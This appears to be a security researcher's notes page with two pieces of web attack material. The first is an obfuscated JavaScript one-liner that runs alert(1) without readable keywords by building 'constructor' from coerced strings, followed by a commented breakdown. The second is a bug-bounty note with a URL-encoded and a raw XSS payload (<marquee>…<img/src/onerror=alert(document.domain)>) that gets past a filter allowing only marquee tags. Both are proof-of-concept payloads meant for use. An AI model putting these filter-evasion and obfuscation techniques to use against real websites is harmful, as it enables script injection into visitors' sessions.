ﾠ7='',ﾠ2=!ﾠ7+ﾠ7,ﾠ4=!ﾠ2+ﾠ7,ﾠ9=ﾠ7+{},ﾠ1=ﾠ2[ﾠ7++],ﾠ3=ﾠ2[ﾠ5=ﾠ7],ﾠ8=++ﾠ5+ﾠ7,ﾠ6=ﾠ9[ﾠ5+ﾠ8],ﾠ2[ﾠ6+=ﾠ9[ﾠ7]+(ﾠ2.ﾠ4+ﾠ9)[ﾠ7]+ﾠ4[ﾠ8]+ﾠ1+ﾠ3+ﾠ2[ﾠ5]+ﾠ6+ﾠ1+ﾠ9[ﾠ7]+ﾠ3][ﾠ6](ﾠ4[ﾠ7]+ﾠ4[ﾠ5]+ﾠ2[ﾠ8]+ﾠ3+ﾠ1+"(ﾠ7)")()
HOW IT WORKS
Here is a formatted version of the ABC. Read it carefully and you will get the idea.

A = ''              // empty string
B = !A + A          // "true"
C = !B + A          // "false"
D = A + {}          // "[object Object]"
E = B[A++]          // "t" = "true"[0]
F = B[G = A]        // "r" = "true"[1]
H = ++G + A         // 2, 3
I = D[G + H]        // "c"

B[
  I +=              // "c"
    D[A] +          // "o" = "object"[0]
    (B.C+D)[A] +    // "n" = "undefined"[1]
    C[H] +          // "s" = "false"[3]
    E +             // "t"
    F +             // "r"
    B[G] +          // "u" = "true"[2]
    I +             // "c" = "[object]"[5]
    E +             // "t"
    D[A] +          // "o" = "[object]"[1]
    F               // "r"
][
  I                 // "constructor"
](
  C[A] +            //  "a"
  C[G] +            //  "l"
  B[H] +            //  "e"
  F +               //  "r"
  E +               //  "t"
  "(A)"             // "(1)"
)()
      
      #
      #
     ##
      # #
   ## # #
 ## # # # #
# # # # ##
# # # # # #
# # # # #  #
20XX - 


An EU BB target filtering everything except <marquee> tag.

I found that placing encoded pl b/w marquee tags after an HTML tag will bypass the filter:

"%3Cmarquee%3E%3C%2Fbr%3E%3C%2Fbr%3E%27%22%3E%22%3E%3Ciframe%3E%3Cimg%2Fsrc%2Fonerror%3Dalert%28document.domain%29%3E"

Real payload (without encode)
<marquee></br></br>'">"><iframe><img/src/onerror=alert(document.domain)>"

Collected from,
https://twitter.com/nav1n0x/status/1384079792882864128?s=19

